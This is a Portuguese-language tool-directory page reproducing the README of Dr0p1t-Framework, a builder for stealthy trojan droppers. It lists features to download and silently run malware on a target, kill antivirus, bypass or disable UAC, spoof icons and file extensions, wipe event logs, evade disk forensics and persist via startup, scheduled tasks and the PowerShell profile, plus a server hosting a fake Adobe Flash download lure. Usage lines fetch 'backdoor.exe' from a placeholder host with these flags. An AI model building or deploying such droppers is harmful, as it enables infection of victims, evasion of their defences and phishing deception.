Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Dr0p1t-Framework — Um framework que cria um dropper stealth avançado que contorna a maioria dos AVs e tem muitos truques. | Kitploit
Ferramentas/GitHubGitHub/d4vinci/dr0p1t-framework
Escalada de PrivilégiosGeração de PayloadsMecanismos de PersistênciaExploraçãoEvasão de IDS/IPSAnálise ForensePhishingAnálise de MalwareComando e ControleEngenharia SocialDesenvolvimento de PayloadsAnti-Bot
1.5k387há 7 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Archived
GitHubd4vinci/dr0p1t-framework

Dr0p1t-Framework

Um framework que cria um dropper stealth avançado que contorna a maioria dos AVs e tem muitos truques.

Ver Repositório

Atualmente não mantido (Aguarde a próxima versão)


Dr0p1t-Framework n0where best cybersecurity tools Python 3.5 Python 2.7 Build Status

Já ouviu falar sobre trojan droppers? Resumindo, dropper é um tipo de malware que baixa outros malwares e o Dr0p1t dá a você a chance de criar um dropper furtivo que contorna a maioria dos AVs e tem muitos truques (Confie em mim :D) ;)

Funcionalidades

+ Propriedades do executável gerado:

  • O tamanho do executável é menor comparado a outros droppers gerados da mesma forma.
  • Baixa executável no sistema alvo e o executa silenciosamente.
  • Função de autodestruição para que o dropper se mate e se apague após terminar seu trabalho
  • Escapa da perícia forense de disco fazendo com que todos os arquivos que o dropper cria e o próprio dropper também limpem seu conteúdo antes da exclusão
  • Limpa o log de eventos após terminar.

+ Propriedades do Framework:

  • Funciona com Windows, Linux e agora tem suporte ao OSX (Agradecimentos a @sm4sh3r)
  • Recurso Dr0p1t-Server (beta) para que agora você possa trabalhar a partir do navegador Veja como trabalhar com Dr0p1t-Server
  • Dr0p1t-Server tem uma opção de golpe (beta) Veja como trabalhar com Dr0p1t-Server

+ Módulos:

  • Encontrar e matar antivírus antes de executar o malware.
  • A capacidade de desabilitar o UAC.
  • A capacidade de executar seu malware como administrador.
  • Spoof completo, falsificando o ícone e a extensão do arquivo para qualquer coisa que você quiser.
  • Suporte a arquivos ZIP para que você possa compactar seu executável em um arquivo zip antes de fazer upload.
  • Executar um arquivo personalizado (batch|powershell|vbs) que você escolheu antes de executar o executável
  • Ao executar scripts powershell, pode contornar a política de execução
  • Usar UPX para comprimir o dropper após criá-lo

+Módulos de persistência:

  • Adicionar executável após baixá-lo na inicialização.
  • Adicionar executável após baixá-lo ao agendador de tarefas (UAC não importa).
  • Adicionar seu arquivo ao perfil do usuário do powershell para que seu arquivo seja baixado e executado toda vez que o powershell.exe for executado, caso não exista.

Screenshots

No Windows

Ver mais

No Linux (Kali linux)

Ver mais

No OSX

Ainda não totalmente testado! Precisa de alguns contribuidores e testadores 😄

Menu de ajuda

root@kitploit:~
Usage: Dr0p1t.py Malware_Url [Options]

options:
-h, --help      show this help message and exit
-s              Add your malware to startup (Persistence)
-t              Add your malware to task scheduler (Persistence)
-a              Add your link to powershell user profile (Persistence)
-k              Kill antivirus process before running your malware.
-b              Run this batch script before running your malware. Check scripts folder
-p              Run this powershell script before running your malware. Check scripts folder
-v              Run this vbs script before running your malware. Check scripts folder
--runas         Bypass UAC and run your malware as admin
--spoof         Spoof the final file to an extension you choose.
--zip           Tell Dr0p1t that the malware in the link is compressed as zip
--upx           Use UPX to compress the final file.
--nouac         Try to disable UAC on victim device
-i              Use icon to the final file. Check icons folder.
--noclearevent  Tell the framework to not clear the event logs on target machine after finish.
--nocompile     Tell the framework to not compile the final file.
--only32        Download your malware for 32 bit devices only
--only64        Download your malware for 64 bit devices only
-q              Stay quite ( no banner )
-u              Check for updates
-nd             Display less output information

Exemplos

root@kitploit:~
./Dr0p1t.py Malware_Url [Options]
./Dr0p1t.py https://test.com/backdoor.exe -s -t -a -k --runas --upx
./Dr0p1t.py https://test.com/backdoor.exe -k -b block_online_scan.bat --only32
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k -p Enable_PSRemoting.ps1 --runas
./Dr0p1t.py https://test.com/backdoor.zip -t -k --nouac -i flash.ico --spoof pdf --zip

Pré-requisitos

  • Python 2 ou Python 3.

A versão recomendada para Python 2 é 2.7.x, a versão recomendada para Python 3 é 3.5.x e não use 3.6 porque ainda não é suportado pelo PyInstaller

Dependências necessárias para Linux

  • apt
  • Outras serão instaladas a partir do arquivo install.sh

Nota: Você deve ter acesso root

Dependências necessárias para Windows

  • pip
  • Módulos no arquivo windows_requirements.txt

Instalação

Há uma lista aqui com todos os vídeos oficiais para instalar e usar o Dr0p1t Playlist

  • No Linux
root@kitploit:~
git clone https://github.com/D4Vinci/Dr0p1t-Framework.git
chmod 777 -R Dr0p1t-Framework
cd Dr0p1t-Framework
sudo chmod +x install.sh
./install.sh
python Dr0p1t.py
  • No Windows (Após baixar o ZIP e descompactá-lo)
root@kitploit:~
cd Dr0p1t-Framework-master
python -m pip install -r windows_requirements.txt
python Dr0p1t.py

Nota: no Python 2.7 você não tem pip, então instale-o primeiro a partir do script get-pip.py [Pesquise no Google]

Testado em:

  • Kali Linux Rolling
  • Ubuntu 14.04-16.04 LTS
  • Windows 10/8.1/8

Trabalhar com Dr0p1t-Server

Nota: O servidor ainda está em versão beta e tem muitos recursos a serem adicionados e também um design melhor [Precisa de um designer para contribuir :D]

Pré-requisitos

  • Conexão de internet estável.
  • Porta 5000 não usada e firewall configurado para não bloquear conexão a ela

Instalação e execução do servidor

No Linux e Windows é o mesmo após instalar o Dr0p1t seguindo os passos mencionados acima, instale os módulos no arquivo server_requirements.txt usando pip como:

root@kitploit:~
python -m pip install -r server_requirements.txt

Agora vamos executar nosso script do servidor:

root@kitploit:~
python Dr0p1t_Server.py

Após executar o script do servidor, ele começará a escutar todas as conexões que chegam à porta 5000 usando flask.

Agora, para usar o servidor do seu dispositivo, abra no navegador 127.0.0.1:5000 ou [Seu IP]:5000.

Para abri-lo de outros dispositivos na LAN, abra [Seu IP Local]:5000 e para outros dispositivos na WAN, abra [Seu IP Global]:5000, mas primeiro certifique-se de ter configurado seu roteador para encaminhar a conexão da porta 5000 para você.

Após abrir a página do servidor, você verá um site simples com um design básico pedindo os dados necessários Veja screenshots do servidor

Em seguida, envie os dados, que serão verificados através de alguns processos, então o arquivo exe será gerado e você será redirecionado para uma página informando o link do golpe.

Após entrar no link, você verá um golpe para baixar o dropper, que por padrão é a página de download do Adobe Flash. Para substituir o golpe pelo seu, substitua o conteúdo do arquivo "Scam.html" pelo seu, mas lembre-se das variáveis (Não as remova).

Screenshots do servidor

Ver mais para Windows Ver mais para Linux

Não distribuir escaneamento (Por favor, não escaneie com virus total:3)

A fazer Confira este link

Contato

  • Twitter

Doação

Se esta ferramenta foi útil para você, sinta-se à vontade para me agradecer comprando um café para mim :)

Coffee

Aviso Legal

O Dr0p1t Framework não é responsável por uso indevido ou para fins ilegais. Use apenas para testes de penetração ou fins educacionais!!!

Copiar um código deste framework ou usá-lo em outra ferramenta é aceito, desde que você mencione de onde o obteve 😄

Pull requests são sempre bem-vindos :D

Baixar ferramenta